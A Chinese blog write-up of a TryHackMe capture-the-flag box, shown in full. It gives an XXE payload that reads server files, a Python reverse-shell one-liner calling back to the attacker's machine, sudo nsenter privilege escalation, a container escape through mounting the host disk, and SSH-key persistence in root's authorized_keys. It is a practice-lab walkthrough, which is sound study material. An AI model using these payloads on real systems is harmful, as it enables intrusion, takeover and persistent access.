[09:51:44] 200 -   91B  - /api/user/session/                                
[09:51:44] 200 -   91B  - /api/user/session

/api/user/session/打印

{"active_sessions":[{"id":1,"username":"admin","hash":"1b4237f476826986da63022a76c35bb1"}]}

貌似可以肯定用戶名就是admin
1b4237f476826986da63022a76c35bb1是md5密文,解密以后是:dQw4w9WgXcQ

然而admin:dQw4w9WgXcQ不能登錄

what the fuck....

這串古怪的符號和youtube上的這個視頻的id居然一樣:
視頻是Rick Astley - Never Gonna Give You Up (Official Music Video),不知道是作者在叫我不要放棄還是有什么提示。。。

爆破admin賬號不成功,sql注入也沒有結(jié)果。在我經(jīng)驗范圍內(nèi),我已經(jīng)用盡了所有方法,所以這個時候我只能看大佬walkthrough了: )

原來是在burpsuite里用xml注入

payload

GET /api/user?xml HTTP/1.1
Host: 10.10.243.173
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 148



<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=index.php">]>
<foo><id>&ac;</id></foo>

返回了index.php的base64密文,解出來是:

<?php
include_once('../Autoload.php');
include_once('../Route.php');
include_once('../Output.php');
include_once('../View.php');

Route::load();
Route::run();

最后在../controllers/Api.php找到admin的登錄憑證:niceWorkHackerm4n

登錄進去后在靶機提供的webshell欄寫payload:

python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.13.21.169",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

收到反彈shell

└─# nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.243.173] 59426
$ ls
ls
bootstrap.min.css  bootstrap.min.js  index.php  jquery.min.js  script.js

查看/etc/passwd我們知道admin是系統(tǒng)里的期中一個用戶,由于我們已經(jīng)知道admin的密碼,這個時候本來可以直接su admin
然而這個系統(tǒng)并沒有su 命令,這個時候可以使用ssh來轉(zhuǎn)換角色

ssh admin@localhost sh

www-data@6b364d3940e6:/var/www/html/public$ ssh admin@localhost sh
ssh admin@localhost sh
admin@localhost's password: 
id
uid=1000(admin) gid=1000(admin) groups=1000(admin),27(sudo)
whoami
admin

這個時候不要切換成tty,用sudo -l查看admin的超級權(quán)限,發(fā)現(xiàn)可以用/usr/bin/nsenter

sudo -l
Matching Defaults entries for admin on 6b364d3940e6:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User admin may run the following commands on 6b364d3940e6:
    (ALL) ALL
    (ALL : ALL) ALL
    (ALL) NOPASSWD: /usr/bin/nsenter

直接提權(quán)到root

sudo /usr/bin/nsenter /bin/sh
id
id
uid=0(root) gid=0(root) groups=0(root)

/root/container1_flag.txt拿flag

fdisk -l命令打印發(fā)現(xiàn)/dev/xvda1這個分區(qū)應(yīng)該是主機的分區(qū)

我們把它掛載到當前docker鏡像的/mnt/compromise下面:

mkdir -p /mnt/compromise
mount /dev/xvda1 /mnt/compromise

/mnt/compromise/root 拿到 root flag

把攻擊機的公鑰追加到靶機的authorized_keys

echo "ssh-rsa *************" >> /mnt/compromise/root/.ssh/authorized_keys

root身份登錄靶機

┌──(root??kali)-[~/tryhackme/hackerhill]
└─# ssh  root@10.10.243.173 -p 22                                                                                                                                                                                                     255 ?
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-1037-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Oct 29 08:25:38 UTC 2021

  System load:                      0.04
  Usage of /:                       88.8% of 7.69GB
  Memory usage:                     72%
  Swap usage:                       37%
  Processes:                        205
  Users logged in:                  0
  IPv4 address for br-9c1efeb291f3: 172.18.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for eth0:            10.10.243.173

  => / is using 88.8% of 7.69GB


0 updates can be installed immediately.
0 of these updates are security updates.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

root@ip-10-10-243-173:~# cat /var/www/container2_flag.txt
cat: /var/www/container2_flag.txt: No such file or directory
root@ip-10-10-243-173:~# whoami
root

全局查找flag2

root@ip-10-10-243-173:/# find / -name container2_flag.txt
find: ‘/proc/27811’: No such file or directory
/var/lib/docker/overlay2/fb80a052499ad52a2df535ce669f4cca3b02009c751ab47752374a566ec61667/diff/var/www/container2_flag.txt
/var/lib/docker/overlay2/7149ee32cde09f7439cc3588b5f757bd6b16aaaccb59f8cf3291e8d6dc6c05db/merged/var/www/container2_flag.txt

全局查找flag3

root@ip-10-10-243-173:/# find / -name container3_flag.txt
find: ‘/proc/28025/task/28025/net’: Invalid argument
find: ‘/proc/28025/net’: Invalid argument
/var/lib/docker/overlay2/d38650b56ff4bbca92fe794176a3394bd05fc9d55d87341b1c0d2a54b5ae1c03/merged/home/container3_flag.txt
/var/lib/docker/overlay2/5bfb136d474f285a5a6133918e11acd8212b7559b33494e11e8c72fbe7e2f6c6/diff/home/container3_flag.txt
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容